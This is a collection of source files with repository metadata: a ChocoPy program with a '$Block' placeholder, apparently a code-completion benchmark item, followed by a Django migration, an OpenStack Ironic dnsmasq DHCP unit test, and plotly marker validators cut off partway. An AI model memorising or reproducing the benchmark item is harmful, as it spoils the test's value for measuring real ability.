[]
no_license
Virtlink/ccbench-chocopy
c3f7f6af6349aff6503196f727ef89f210a1eac8
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
refs/heads/main
2023-04-07T15:07:12.464038
2022-02-03T15:42:39
2022-02-03T15:42:39
451,969,776
0
0
null
null
null
null
UTF-8
Python
false
false
13,176
py
count:int = 0 count2:int = 0 count3:int = 0 count4:int = 0 count5:int = 0 def foo(s: str) -> int: return len(s) def foo2(s: str, s2: str) -> int: return len(s) def foo3(s: str, s2: str, s3: str) -> int: return len(s) def foo4(s: str, s2: str, s3: str, s4: str) -> int: return len(s) def foo5(s: str, s2: str, s3: str, s4: str, s5: str) -> int: return len(s) class bar(object): p: bool = True def baz(self:"bar", xx: [int]) -> str: global count x:int = 0 y:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! ChocoPy count = count + 1 while x <= 0: if self.p: xx[0] = xx[1] self.p = not self.p x = x + 1 elif foo("Long"[0]) == 1: self.p = self is None return "Nope" class bar2(object): p: bool = True p2: bool = True def baz(self:"bar2", xx: [int]) -> str: global count x:int = 0 y:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! ChocoPy count = count + 1 while x <= 0: if self.p: xx[0] = xx[1] self.p = not self.p x = x + 1 elif foo("Long"[0]) == 1: self.p = self is None return "Nope" def baz2(self:"bar2", xx: [int], xx2: [int]) -> str: global count x:int = 0 x2:int = 0 y:int = 1 y2:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 def qux2(y: int, y2: int) -> object: nonlocal x nonlocal x2 if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! ChocoPy count = count + 1 while x <= 0: if self.p: xx[0] = xx[1] self.p = not self.p x = x + 1 elif foo("Long"[0]) == 1: self.p = self is None return "Nope" class bar3(object): p: bool = True p2: bool = True p3: bool = True def baz(self:"bar3", xx: [int]) -> str: global count x:int = 0 y:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! ChocoPy count = count + 1 while x <= 0: $Block return "Nope" def baz2(self:"bar3", xx: [int], xx2: [int]) -> str: global count x:int = 0 x2:int = 0 y:int = 1 y2:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 def qux2(y: int, y2: int) -> object: nonlocal x nonlocal x2 if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! ChocoPy count = count + 1 while x <= 0: if self.p: xx[0] = xx[1] self.p = not self.p x = x + 1 elif foo("Long"[0]) == 1: self.p = self is None return "Nope" def baz3(self:"bar3", xx: [int], xx2: [int], xx3: [int]) -> str: global count x:int = 0 x2:int = 0 x3:int = 0 y:int = 1 y2:int = 1 y3:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 def qux2(y: int, y2: int) -> object: nonlocal x nonlocal x2 if x > y: x = -1 def qux3(y: int, y2: int, y3: int) -> object: nonlocal x nonlocal x2 nonlocal x3 if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! ChocoPy count = count + 1 while x <= 0: if self.p: xx[0] = xx[1] self.p = not self.p x = x + 1 elif foo("Long"[0]) == 1: self.p = self is None return "Nope" class bar4(object): p: bool = True p2: bool = True p3: bool = True p4: bool = True def baz(self:"bar4", xx: [int]) -> str: global count x:int = 0 y:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! ChocoPy count = count + 1 while x <= 0: if self.p: xx[0] = xx[1] self.p = not self.p x = x + 1 elif foo("Long"[0]) == 1: self.p = self is None return "Nope" def baz2(self:"bar4", xx: [int], xx2: [int]) -> str: global count x:int = 0 x2:int = 0 y:int = 1 y2:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 def qux2(y: int, y2: int) -> object: nonlocal x nonlocal x2 if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! ChocoPy count = count + 1 while x <= 0: if self.p: xx[0] = xx[1] self.p = not self.p x = x + 1 elif foo("Long"[0]) == 1: self.p = self is None return "Nope" def baz3(self:"bar4", xx: [int], xx2: [int], xx3: [int]) -> str: global count x:int = 0 x2:int = 0 x3:int = 0 y:int = 1 y2:int = 1 y3:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 def qux2(y: int, y2: int) -> object: nonlocal x nonlocal x2 if x > y: x = -1 def qux3(y: int, y2: int, y3: int) -> object: nonlocal x nonlocal x2 nonlocal x3 if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! ChocoPy count = count + 1 while x <= 0: if self.p: xx[0] = xx[1] self.p = not self.p x = x + 1 elif foo("Long"[0]) == 1: self.p = self is None return "Nope" def baz4(self:"bar4", xx: [int], xx2: [int], xx3: [int], xx4: [int]) -> str: global count x:int = 0 x2:int = 0 x3:int = 0 x4:int = 0 y:int = 1 y2:int = 1 y3:int = 1 y4:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 def qux2(y: int, y2: int) -> object: nonlocal x nonlocal x2 if x > y: x = -1 def qux3(y: int, y2: int, y3: int) -> object: nonlocal x nonlocal x2 nonlocal x3 if x > y: x = -1 def qux4(y: int, y2: int, y3: int, y4: int) -> object: nonlocal x nonlocal x2 nonlocal x3 nonlocal x4 if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! ChocoPy count = count + 1 while x <= 0: if self.p: xx[0] = xx[1] self.p = not self.p x = x + 1 elif foo("Long"[0]) == 1: self.p = self is None return "Nope" class bar5(object): p: bool = True p2: bool = True p3: bool = True p4: bool = True p5: bool = True def baz(self:"bar5", xx: [int]) -> str: global count x:int = 0 y:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! ChocoPy count = count + 1 while x <= 0: if self.p: xx[0] = xx[1] self.p = not self.p x = x + 1 elif foo("Long"[0]) == 1: self.p = self is None return "Nope" def baz2(self:"bar5", xx: [int], xx2: [int]) -> str: global count x:int = 0 x2:int = 0 y:int = 1 y2:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 def qux2(y: int, y2: int) -> object: nonlocal x nonlocal x2 if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! ChocoPy count = count + 1 while x <= 0: if self.p: xx[0] = xx[1] self.p = not self.p x = x + 1 elif foo("Long"[0]) == 1: self.p = self is None return "Nope" def baz3(self:"bar5", xx: [int], xx2: [int], xx3: [int]) -> str: global count x:int = 0 x2:int = 0 x3:int = 0 y:int = 1 y2:int = 1 y3:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 def qux2(y: int, y2: int) -> object: nonlocal x nonlocal x2 if x > y: x = -1 def qux3(y: int, y2: int, y3: int) -> object: nonlocal x nonlocal x2 nonlocal x3 if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! ChocoPy count = count + 1 while x <= 0: if self.p: xx[0] = xx[1] self.p = not self.p x = x + 1 elif foo("Long"[0]) == 1: self.p = self is None return "Nope" def baz4(self:"bar5", xx: [int], xx2: [int], xx3: [int], xx4: [int]) -> str: global count x:int = 0 x2:int = 0 x3:int = 0 x4:int = 0 y:int = 1 y2:int = 1 y3:int = 1 y4:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 def qux2(y: int, y2: int) -> object: nonlocal x nonlocal x2 if x > y: x = -1 def qux3(y: int, y2: int, y3: int) -> object: nonlocal x nonlocal x2 nonlocal x3 if x > y: x = -1 def qux4(y: int, y2: int, y3: int, y4: int) -> object: nonlocal x nonlocal x2 nonlocal x3 nonlocal x4 if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! ChocoPy count = count + 1 while x <= 0: if self.p: xx[0] = xx[1] self.p = not self.p x = x + 1 elif foo("Long"[0]) == 1: self.p = self is None return "Nope" def baz5(self:"bar5", xx: [int], xx2: [int], xx3: [int], xx4: [int], xx5: [int]) -> str: global count x:int = 0 x2:int = 0 x3:int = 0 x4:int = 0 x5:int = 0 y:int = 1 y2:int = 1 y3:int = 1 y4:int = 1 y5:int = 1 def qux(y: int) -> object: nonlocal x if x > y: x = -1 def qux2(y: int, y2: int) -> object: nonlocal x nonlocal x2 if x > y: x = -1 def qux3(y: int, y2: int, y3: int) -> object: nonlocal x nonlocal x2 nonlocal x3 if x > y: x = -1 def qux4(y: int, y2: int, y3: int, y4: int) -> object: nonlocal x nonlocal x2 nonlocal x3 nonlocal x4 if x > y: x = -1 def qux5(y: int, y2: int, y3: int, y4: int, y5: int) -> object: nonlocal x nonlocal x2 nonlocal x3 nonlocal x4 nonlocal x5 if x > y: x = -1 for x in xx: self.p = x == 2 qux(0) # Yay! ChocoPy count = count + 1 while x <= 0: if self.p: xx[0] = xx[1] self.p = not self.p x = x + 1 elif foo("Long"[0]) == 1: self.p = self is None return "Nope" print(bar().baz([1,2]))
6399568472f674133ea232ed648f413406c0c095
fd15d1a9d0fdf6908bb7c8d1d4490bb6cf817d1f
/CareerFlash/migrations/0012_auto_20190918_0307.py
4a906d6dd1216a9a77ebe27977af08c7ec4755fd
[]
no_license
stanleysh/Career-Flash
8bca183ae2576c0aae7dbdb62c2abd60e8890e6d
6e062afb5ef8959141475e1d73af431a0cf047b4
refs/heads/master
2020-08-05T06:23:26.427944
2019-09-19T17:34:23
2019-09-19T17:34:23
null
0
0
null
null
null
null
UTF-8
Python
false
false
402
py
# Generated by Django 2.2.5 on 2019-09-18 03:07 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('CareerFlash', '0011_orginization'), ] operations = [ migrations.AlterField( model_name='orginization', name='name', field=models.CharField(max_length=255, unique=True), ), ]
cdc243853b5430781b560f6d3f53ceeb14bb4b58
a0447b03ad89a41a5c2e2073e32aeaf4d6279340
/ironic/tests/unit/dhcp/test_dnsmasq.py
64fe46f3393fd13874809d60d2532be93e42bae0
[ "Apache-2.0" ]
permissive
openstack/ironic
2ae87e36d7a62d44b7ed62cad4e2e294d48e061b
ab76ff12e1c3c2208455e917f1a40d4000b4e990
refs/heads/master
2023-08-31T11:08:34.486456
2023-08-31T04:45:05
2023-08-31T04:45:05
10,066,301
411
365
Apache-2.0
2023-07-25T02:05:53
2013-05-14T22:28:24
Python
UTF-8
Python
false
false
5,237
py
# # Copyright 2022 Red Hat, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import os import tempfile from ironic.common import dhcp_factory from ironic.common import utils as common_utils from ironic.conductor import task_manager from ironic.tests.unit.db import base as db_base from ironic.tests.unit.objects import utils as object_utils class TestDnsmasqDHCPApi(db_base.DbTestCase): def setUp(self): super(TestDnsmasqDHCPApi, self).setUp() self.config(dhcp_provider='dnsmasq', group='dhcp') self.node = object_utils.create_test_node(self.context) self.ports = [ object_utils.create_test_port( self.context, node_id=self.node.id, id=2, uuid='1be26c0b-03f2-4d2e-ae87-c02d7f33c782', address='52:54:00:cf:2d:32', pxe_enabled=True)] self.optsdir = tempfile.mkdtemp() self.addCleanup(lambda: common_utils.rmtree_without_raise( self.optsdir)) self.config(dhcp_optsdir=self.optsdir, group='dnsmasq') self.hostsdir = tempfile.mkdtemp() self.addCleanup(lambda: common_utils.rmtree_without_raise( self.hostsdir)) self.config(dhcp_hostsdir=self.hostsdir, group='dnsmasq') dhcp_factory.DHCPFactory._dhcp_provider = None self.api = dhcp_factory.DHCPFactory() self.opts = [ { 'ip_version': 4, 'opt_name': '67', 'opt_value': 'bootx64.efi' }, { 'ip_version': 4, 'opt_name': '210', 'opt_value': '/tftpboot/' }, { 'ip_version': 4, 'opt_name': '66', 'opt_value': '192.0.2.135', }, { 'ip_version': 4, 'opt_name': '150', 'opt_value': '192.0.2.135' }, { 'ip_version': 4, 'opt_name': '255', 'opt_value': '192.0.2.135' } ] def test_update_dhcp(self): with task_manager.acquire(self.context, self.node.uuid) as task: self.api.update_dhcp(task, self.opts) dnsmasq_tag = task.node.driver_internal_info.get('dnsmasq_tag') self.assertEqual(36, len(dnsmasq_tag)) hostfile = os.path.join(self.hostsdir, 'ironic-52:54:00:cf:2d:32.conf') with open(hostfile, 'r') as f: self.assertEqual( '52:54:00:cf:2d:32,set:%s,set:ironic\n' % dnsmasq_tag, f.readline()) optsfile = os.path.join(self.optsdir, 'ironic-%s.conf' % self.node.uuid) with open(optsfile, 'r') as f: self.assertEqual([ 'tag:%s,67,bootx64.efi\n' % dnsmasq_tag, 'tag:%s,210,/tftpboot/\n' % dnsmasq_tag, 'tag:%s,66,192.0.2.135\n' % dnsmasq_tag, 'tag:%s,150,192.0.2.135\n' % dnsmasq_tag, 'tag:%s,255,192.0.2.135\n' % dnsmasq_tag], f.readlines()) def test_get_ip_addresses(self): with task_manager.acquire(self.context, self.node.uuid) as task: with tempfile.NamedTemporaryFile() as fp: self.config(dhcp_leasefile=fp.name, group='dnsmasq') fp.write(b"1659975057 52:54:00:cf:2d:32 192.0.2.198 * *\n") fp.flush() self.assertEqual( ['192.0.2.198'], self.api.provider.get_ip_addresses(task)) def test_clean_dhcp_opts(self): with task_manager.acquire(self.context, self.node.uuid) as task: self.api.update_dhcp(task, self.opts) hostfile = os.path.join(self.hostsdir, 'ironic-52:54:00:cf:2d:32.conf') optsfile = os.path.join(self.optsdir, 'ironic-%s.conf' % self.node.uuid) self.assertTrue(os.path.isfile(hostfile)) self.assertTrue(os.path.isfile(optsfile)) with task_manager.acquire(self.context, self.node.uuid) as task: self.api.clean_dhcp(task) # assert the host file remains with the ignore directive, and the opts # file is deleted with open(hostfile, 'r') as f: self.assertEqual( '52:54:00:cf:2d:32,ignore\n', f.readline()) self.assertFalse(os.path.isfile(optsfile))
d1c15709092c258b430c6ded3da4b80b379da6d7
bb1e0e89fcf1f1ffb61214ddf262ba327dd10757
/plotly_study/validators/scattergl/marker/__init__.py
5076833461f161bf0707c189a46671576aba5327
[ "MIT" ]
permissive
lucasiscovici/plotly_py
ccb8c3ced89a0f7eccf1ae98551fa712460033fe
42ab769febb45fbbe0a3c677dc4306a4f59cea36
refs/heads/master
2020-09-12T05:43:12.363609
2019-12-02T15:13:13
2019-12-02T15:13:13
222,328,180
0
0
null
null
null
null
UTF-8
Python
false
false
35,078
py
import _plotly_utils.basevalidators class SymbolsrcValidator(_plotly_utils.basevalidators.SrcValidator): def __init__( self, plotly_name="symbolsrc", parent_name="scattergl.marker", **kwargs ): super(SymbolsrcValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "none"), role=kwargs.pop("role", "info"), **kwargs ) import _plotly_utils.basevalidators class SymbolValidator(_plotly_utils.basevalidators.EnumeratedValidator): def __init__(self, plotly_name="symbol", parent_name="scattergl.marker", **kwargs): super(SymbolValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, array_ok=kwargs.pop("array_ok", True), edit_type=kwargs.pop("edit_type", "calc"), role=kwargs.pop("role", "style"), values=kwargs.pop( "values", [ 0, "circle", 100, "circle-open", 200, "circle-dot", 300, "circle-open-dot", 1, "square", 101, "square-open", 201, "square-dot", 301, "square-open-dot", 2, "diamond", 102, "diamond-open", 202, "diamond-dot", 302, "diamond-open-dot", 3, "cross", 103, "cross-open", 203, "cross-dot", 303, "cross-open-dot", 4, "x", 104, "x-open", 204, "x-dot", 304, "x-open-dot", 5, "triangle-up", 105, "triangle-up-open", 205, "triangle-up-dot", 305, "triangle-up-open-dot", 6, "triangle-down", 106, "triangle-down-open", 206, "triangle-down-dot", 306, "triangle-down-open-dot", 7, "triangle-left", 107, "triangle-left-open", 207, "triangle-left-dot", 307, "triangle-left-open-dot", 8, "triangle-right", 108, "triangle-right-open", 208, "triangle-right-dot", 308, "triangle-right-open-dot", 9, "triangle-ne", 109, "triangle-ne-open", 209, "triangle-ne-dot", 309, "triangle-ne-open-dot", 10, "triangle-se", 110, "triangle-se-open", 210, "triangle-se-dot", 310, "triangle-se-open-dot", 11, "triangle-sw", 111, "triangle-sw-open", 211, "triangle-sw-dot", 311, "triangle-sw-open-dot", 12, "triangle-nw", 112, "triangle-nw-open", 212, "triangle-nw-dot", 312, "triangle-nw-open-dot", 13, "pentagon", 113, "pentagon-open", 213, "pentagon-dot", 313, "pentagon-open-dot", 14, "hexagon", 114, "hexagon-open", 214, "hexagon-dot", 314, "hexagon-open-dot", 15, "hexagon2", 115, "hexagon2-open", 215, "hexagon2-dot", 315, "hexagon2-open-dot", 16, "octagon", 116, "octagon-open", 216, "octagon-dot", 316, "octagon-open-dot", 17, "star", 117, "star-open", 217, "star-dot", 317, "star-open-dot", 18, "hexagram", 118, "hexagram-open", 218, "hexagram-dot", 318, "hexagram-open-dot", 19, "star-triangle-up", 119, "star-triangle-up-open", 219, "star-triangle-up-dot", 319, "star-triangle-up-open-dot", 20, "star-triangle-down", 120, "star-triangle-down-open", 220, "star-triangle-down-dot", 320, "star-triangle-down-open-dot", 21, "star-square", 121, "star-square-open", 221, "star-square-dot", 321, "star-square-open-dot", 22, "star-diamond", 122, "star-diamond-open", 222, "star-diamond-dot", 322, "star-diamond-open-dot", 23, "diamond-tall", 123, "diamond-tall-open", 223, "diamond-tall-dot", 323, "diamond-tall-open-dot", 24, "diamond-wide", 124, "diamond-wide-open", 224, "diamond-wide-dot", 324, "diamond-wide-open-dot", 25, "hourglass", 125, "hourglass-open", 26, "bowtie", 126, "bowtie-open", 27, "circle-cross", 127, "circle-cross-open", 28, "circle-x", 128, "circle-x-open", 29, "square-cross", 129, "square-cross-open", 30, "square-x", 130, "square-x-open", 31, "diamond-cross", 131, "diamond-cross-open", 32, "diamond-x", 132, "diamond-x-open", 33, "cross-thin", 133, "cross-thin-open", 34, "x-thin", 134, "x-thin-open", 35, "asterisk", 135, "asterisk-open", 36, "hash", 136, "hash-open", 236, "hash-dot", 336, "hash-open-dot", 37, "y-up", 137, "y-up-open", 38, "y-down", 138, "y-down-open", 39, "y-left", 139, "y-left-open", 40, "y-right", 140, "y-right-open", 41, "line-ew", 141, "line-ew-open", 42, "line-ns", 142, "line-ns-open", 43, "line-ne", 143, "line-ne-open", 44, "line-nw", 144, "line-nw-open", ], ), **kwargs ) import _plotly_utils.basevalidators class SizesrcValidator(_plotly_utils.basevalidators.SrcValidator): def __init__(self, plotly_name="sizesrc", parent_name="scattergl.marker", **kwargs): super(SizesrcValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "none"), role=kwargs.pop("role", "info"), **kwargs ) import _plotly_utils.basevalidators class SizerefValidator(_plotly_utils.basevalidators.NumberValidator): def __init__(self, plotly_name="sizeref", parent_name="scattergl.marker", **kwargs): super(SizerefValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "calc"), role=kwargs.pop("role", "style"), **kwargs ) import _plotly_utils.basevalidators class SizemodeValidator(_plotly_utils.basevalidators.EnumeratedValidator): def __init__( self, plotly_name="sizemode", parent_name="scattergl.marker", **kwargs ): super(SizemodeValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "calc"), role=kwargs.pop("role", "info"), values=kwargs.pop("values", ["diameter", "area"]), **kwargs ) import _plotly_utils.basevalidators class SizeminValidator(_plotly_utils.basevalidators.NumberValidator): def __init__(self, plotly_name="sizemin", parent_name="scattergl.marker", **kwargs): super(SizeminValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "calc"), min=kwargs.pop("min", 0), role=kwargs.pop("role", "style"), **kwargs ) import _plotly_utils.basevalidators class SizeValidator(_plotly_utils.basevalidators.NumberValidator): def __init__(self, plotly_name="size", parent_name="scattergl.marker", **kwargs): super(SizeValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, array_ok=kwargs.pop("array_ok", True), edit_type=kwargs.pop("edit_type", "calc"), min=kwargs.pop("min", 0), role=kwargs.pop("role", "style"), **kwargs ) import _plotly_utils.basevalidators class ShowscaleValidator(_plotly_utils.basevalidators.BooleanValidator): def __init__( self, plotly_name="showscale", parent_name="scattergl.marker", **kwargs ): super(ShowscaleValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "calc"), role=kwargs.pop("role", "info"), **kwargs ) import _plotly_utils.basevalidators class ReversescaleValidator(_plotly_utils.basevalidators.BooleanValidator): def __init__( self, plotly_name="reversescale", parent_name="scattergl.marker", **kwargs ): super(ReversescaleValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "calc"), role=kwargs.pop("role", "style"), **kwargs ) import _plotly_utils.basevalidators class OpacitysrcValidator(_plotly_utils.basevalidators.SrcValidator): def __init__( self, plotly_name="opacitysrc", parent_name="scattergl.marker", **kwargs ): super(OpacitysrcValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "none"), role=kwargs.pop("role", "info"), **kwargs ) import _plotly_utils.basevalidators class OpacityValidator(_plotly_utils.basevalidators.NumberValidator): def __init__(self, plotly_name="opacity", parent_name="scattergl.marker", **kwargs): super(OpacityValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, array_ok=kwargs.pop("array_ok", True), edit_type=kwargs.pop("edit_type", "calc"), max=kwargs.pop("max", 1), min=kwargs.pop("min", 0), role=kwargs.pop("role", "style"), **kwargs ) import _plotly_utils.basevalidators class LineValidator(_plotly_utils.basevalidators.CompoundValidator): def __init__(self, plotly_name="line", parent_name="scattergl.marker", **kwargs): super(LineValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, data_class_str=kwargs.pop("data_class_str", "Line"), data_docs=kwargs.pop( "data_docs", """ autocolorscale Determines whether the colorscale is a default palette (`autocolorscale: true`) or the palette determined by `marker.line.colorscale`. Has an effect only if in `marker.line.color`is set to a numerical array. In case `colorscale` is unspecified or `autocolorscale` is true, the default palette will be chosen according to whether numbers in the `color` array are all positive, all negative or mixed. cauto Determines whether or not the color domain is computed with respect to the input data (here in `marker.line.color`) or the bounds set in `marker.line.cmin` and `marker.line.cmax` Has an effect only if in `marker.line.color`is set to a numerical array. Defaults to `false` when `marker.line.cmin` and `marker.line.cmax` are set by the user. cmax Sets the upper bound of the color domain. Has an effect only if in `marker.line.color`is set to a numerical array. Value should have the same units as in `marker.line.color` and if set, `marker.line.cmin` must be set as well. cmid Sets the mid-point of the color domain by scaling `marker.line.cmin` and/or `marker.line.cmax` to be equidistant to this point. Has an effect only if in `marker.line.color`is set to a numerical array. Value should have the same units as in `marker.line.color`. Has no effect when `marker.line.cauto` is `false`. cmin Sets the lower bound of the color domain. Has an effect only if in `marker.line.color`is set to a numerical array. Value should have the same units as in `marker.line.color` and if set, `marker.line.cmax` must be set as well. color Sets themarker.linecolor. It accepts either a specific color or an array of numbers that are mapped to the colorscale relative to the max and min values of the array or relative to `marker.line.cmin` and `marker.line.cmax` if set. coloraxis Sets a reference to a shared color axis. References to these shared color axes are "coloraxis", "coloraxis2", "coloraxis3", etc. Settings for these shared color axes are set in the layout, under `layout.coloraxis`, `layout.coloraxis2`, etc. Note that multiple color scales can be linked to the same color axis. colorscale Sets the colorscale. Has an effect only if in `marker.line.color`is set to a numerical array. The colorscale must be an array containing arrays mapping a normalized value to an rgb, rgba, hex, hsl, hsv, or named color string. At minimum, a mapping for the lowest (0) and highest (1) values are required. For example, `[[0, 'rgb(0,0,255)'], [1, 'rgb(255,0,0)']]`. To control the bounds of the colorscale in color space, use`marker.line.cmin` and `marker.line.cmax`. Alternatively, `colorscale` may be a palette name string of the following list: Greys,YlGnBu,Greens,YlOrRd,Bluered,RdBu,R eds,Blues,Picnic,Rainbow,Portland,Jet,Hot,Black body,Earth,Electric,Viridis,Cividis. colorsrc Sets the source reference on plot.ly for color . reversescale Reverses the color mapping if true. Has an effect only if in `marker.line.color`is set to a numerical array. If true, `marker.line.cmin` will correspond to the last color in the array and `marker.line.cmax` will correspond to the first color. width Sets the width (in px) of the lines bounding the marker points. widthsrc Sets the source reference on plot.ly for width . """, ), **kwargs ) import _plotly_utils.basevalidators class ColorsrcValidator(_plotly_utils.basevalidators.SrcValidator): def __init__( self, plotly_name="colorsrc", parent_name="scattergl.marker", **kwargs ): super(ColorsrcValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "none"), role=kwargs.pop("role", "info"), **kwargs ) import _plotly_utils.basevalidators class ColorscaleValidator(_plotly_utils.basevalidators.ColorscaleValidator): def __init__( self, plotly_name="colorscale", parent_name="scattergl.marker", **kwargs ): super(ColorscaleValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "calc"), implied_edits=kwargs.pop("implied_edits", {"autocolorscale": False}), role=kwargs.pop("role", "style"), **kwargs ) import _plotly_utils.basevalidators class ColorBarValidator(_plotly_utils.basevalidators.CompoundValidator): def __init__( self, plotly_name="colorbar", parent_name="scattergl.marker", **kwargs ): super(ColorBarValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, data_class_str=kwargs.pop("data_class_str", "ColorBar"), data_docs=kwargs.pop( "data_docs", """ bgcolor Sets the color of padded area. bordercolor Sets the axis line color. borderwidth Sets the width (in px) or the border enclosing this color bar. dtick Sets the step in-between ticks on this axis. Use with `tick0`. Must be a positive number, or special strings available to "log" and "date" axes. If the axis `type` is "log", then ticks are set every 10^(n*dtick) where n is the tick number. For example, to set a tick mark at 1, 10, 100, 1000, ... set dtick to 1. To set tick marks at 1, 100, 10000, ... set dtick to 2. To set tick marks at 1, 5, 25, 125, 625, 3125, ... set dtick to log_10(5), or 0.69897000433. "log" has several special values; "L<f>", where `f` is a positive number, gives ticks linearly spaced in value (but not position). For example `tick0` = 0.1, `dtick` = "L0.5" will put ticks at 0.1, 0.6, 1.1, 1.6 etc. To show powers of 10 plus small digits between, use "D1" (all digits) or "D2" (only 2 and 5). `tick0` is ignored for "D1" and "D2". If the axis `type` is "date", then you must convert the time to milliseconds. For example, to set the interval between ticks to one day, set `dtick` to 86400000.0. "date" also has special values "M<n>" gives ticks spaced by a number of months. `n` must be a positive integer. To set ticks on the 15th of every third month, set `tick0` to "2000-01-15" and `dtick` to "M3". To set ticks every 4 years, set `dtick` to "M48" exponentformat Determines a formatting rule for the tick exponents. For example, consider the number 1,000,000,000. If "none", it appears as 1,000,000,000. If "e", 1e+9. If "E", 1E+9. If "power", 1x10^9 (with 9 in a super script). If "SI", 1G. If "B", 1B. len Sets the length of the color bar This measure excludes the padding of both ends. That is, the color bar length is this length minus the padding on both ends. lenmode Determines whether this color bar's length (i.e. the measure in the color variation direction) is set in units of plot "fraction" or in *pixels. Use `len` to set the value. nticks Specifies the maximum number of ticks for the particular axis. The actual number of ticks will be chosen automatically to be less than or equal to `nticks`. Has an effect only if `tickmode` is set to "auto". outlinecolor Sets the axis line color. outlinewidth Sets the width (in px) of the axis line. separatethousands If "true", even 4-digit integers are separated showexponent If "all", all exponents are shown besides their significands. If "first", only the exponent of the first tick is shown. If "last", only the exponent of the last tick is shown. If "none", no exponents appear. showticklabels Determines whether or not the tick labels are drawn. showtickprefix If "all", all tick labels are displayed with a prefix. If "first", only the first tick is displayed with a prefix. If "last", only the last tick is displayed with a suffix. If "none", tick prefixes are hidden. showticksuffix Same as `showtickprefix` but for tick suffixes. thickness Sets the thickness of the color bar This measure excludes the size of the padding, ticks and labels. thicknessmode Determines whether this color bar's thickness (i.e. the measure in the constant color direction) is set in units of plot "fraction" or in "pixels". Use `thickness` to set the value. tick0 Sets the placement of the first tick on this axis. Use with `dtick`. If the axis `type` is "log", then you must take the log of your starting tick (e.g. to set the starting tick to 100, set the `tick0` to 2) except when `dtick`=*L<f>* (see `dtick` for more info). If the axis `type` is "date", it should be a date string, like date data. If the axis `type` is "category", it should be a number, using the scale where each category is assigned a serial number from zero in the order it appears. tickangle Sets the angle of the tick labels with respect to the horizontal. For example, a `tickangle` of -90 draws the tick labels vertically. tickcolor Sets the tick color. tickfont Sets the color bar's tick label font tickformat Sets the tick label formatting rule using d3 formatting mini-languages which are very similar to those in Python. For numbers, see: https://github.com/d3/d3-3.x-api- reference/blob/master/Formatting.md#d3_format And for dates see: https://github.com/d3/d3-3.x-api- reference/blob/master/Time-Formatting.md#format We add one item to d3's date formatter: "%{n}f" for fractional seconds with n digits. For example, *2016-10-13 09:15:23.456* with tickformat "%H~%M~%S.%2f" would display "09~15~23.46" tickformatstops A tuple of plotly_study.graph_objects.scattergl.marke r.colorbar.Tickformatstop instances or dicts with compatible properties tickformatstopdefaults When used in a template (as layout.template.dat a.scattergl.marker.colorbar.tickformatstopdefau lts), sets the default property values to use for elements of scattergl.marker.colorbar.tickformatstops ticklen Sets the tick length (in px). tickmode Sets the tick mode for this axis. If "auto", the number of ticks is set via `nticks`. If "linear", the placement of the ticks is determined by a starting position `tick0` and a tick step `dtick` ("linear" is the default value if `tick0` and `dtick` are provided). If "array", the placement of the ticks is set via `tickvals` and the tick text is `ticktext`. ("array" is the default value if `tickvals` is provided). tickprefix Sets a tick label prefix. ticks Determines whether ticks are drawn or not. If "", this axis' ticks are not drawn. If "outside" ("inside"), this axis' are drawn outside (inside) the axis lines. ticksuffix Sets a tick label suffix. ticktext Sets the text displayed at the ticks position via `tickvals`. Only has an effect if `tickmode` is set to "array". Used with `tickvals`. ticktextsrc Sets the source reference on plot.ly for ticktext . tickvals Sets the values at which 